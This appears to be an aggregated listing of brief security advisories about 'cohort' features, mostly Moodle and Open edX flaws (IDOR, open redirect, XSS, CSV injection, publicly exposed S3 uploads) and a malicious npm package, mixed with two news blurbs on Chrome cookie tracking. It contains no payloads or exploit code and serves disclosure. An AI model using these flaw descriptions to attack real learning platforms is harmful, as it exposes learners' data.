BIT-MOODLE-2025-3647 Moodle: idor when accessing the cohorts report

A flaw was discovered in Moodle. Additional checks were required to ensure that users can only access cohort data they are authorized to retrieve...

EUVD-2025-198952

Malicious code in @posthog/automatic-cohorts-plugin npm...

Malicious code in @posthog/automatic-cohorts-plugin (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6bf3963e4ab04b6b37d6cbb3f237a7b5577ddd854a7249a30f8b78dcc063af97 The package @posthog/automatic-cohorts-plugin was found to contain malicious code. Source: google-open-source-security...

Incorrect Authorization

Overview moodle/moodle is a learning platform. Affected versions of this package are vulnerable to Incorrect Authorization via the cohorts report. An attacker can access unauthorized cohort data by exploiting insufficient access control checks. Remediation Upgrade moodle/moodle to version 4.1.18,...

CVE-2024-41806

The Open edX Platform is a learning management platform. Instructors can upload csv files containing learner information to create cohorts in the instructor dashboard. These files are uploaded using the django default storage. With certain storage backends, uploads may become publicly available...

CVE-2024-41806

Open edX Platform's instructor CSV uploads for cohorts can be publicly accessible when using certain storage backends. The root cause is that uploads to AWS S3 buckets could be written with a public ACL in affected branches (master, palm, olive, nutmeg, maple, lilac, koa, juniper). A patch (commi...

CVE-2024-41806 Open edX Platform's instructor upload CSV for cohort creation not Private by Default

The Open edX Platform is a learning management platform. Instructors can upload csv files containing learner information to create cohorts in the instructor dashboard. These files are uploaded using the django default storage. With certain storage backends, uploads may become publicly available...

PT-2024-5257 · Amazon · Aws S3

Name of the Vulnerable Software and Affected Versions: Open edX Platform versions master, palm, olive, nutmeg, maple, lilac, koa, or juniper Description: The issue is related to inadequate access control in the Open edX Platform, specifically with the AWS S3 Bucket Handler component. This may all...

Chrome starts the countdown to the end of tracking cookies

Google has announced that it will start rolling its Chrome web browsers new Tracking Protection feature from January of 2024. Tracking Protection is part of Google’s Privacy Sandbox initiative to phase out third-party cookies. The Tracking Protection feature aims to disable third-party cookies...

GHSA-5XP2-RV4H-MM2Q Moodle Open Redirect Vulnerability

A flaw was found in Moodle before 3.7, 3.6.4, 3.5.6, 3.4.9 and 3.1.18. The form to upload cohorts contained a redirect field, which was not restricted to internal URLs...

Moodle Open Redirect Vulnerability

A flaw was found in Moodle before 3.7, 3.6.4, 3.5.6, 3.4.9 and 3.1.18. The form to upload cohorts contained a redirect field, which was not restricted to internal URLs...

Google FLoC puts ad trackers on a cookie-free diet

Cookie tracking is dying and Google needs a replacement. Its betting on FLoC, an ad tracking technology that lets it understand peoples behaviour while respecting their privacy. Google has announced that its tests show promising signs that FLoC is working. Is this a milestone on the road to more...

CVE-2020-13146

Studio in Open edX Ironwood 2.5 allows CSV injection because an added cohort in CourseInstructorCohorts may contain a formula that is exported via the "CourseData DownloadsReportsDownload profile info" feature...

CVE-2019-14879

A vulnerability was found in Moodle versions 3.7.x before 3.7.3, 3.6.x before 3.6.7 and 3.5.x before 3.5.9. When a cohort role assignment was removed, the associated capabilities were not being revoked where applicable...

CVE-2019-10133

A flaw was found in Moodle before 3.7, 3.6.4, 3.5.6, 3.4.9 and 3.1.18. The form to upload cohorts contained a redirect field, which was not restricted to internal URLs...

Moodle Input Validation Error Vulnerability (CNVD-2019-35809)

Moodle is a free, open-source e-learning software platform, also known as a course management system, learning management system or virtual learning environment. An input validation error vulnerability exists in the upload cohorts page in Moodle, which stems from a network system or product that...

Cross-Site Scripting (XSS)

Moodle is susceptible to cross-site scripting XSS attacks. The attacks are possible because the idnumber field used in the administration of cohorts is not properly escaped. The artifact is due to incorrect fix for CVE-2012-2365...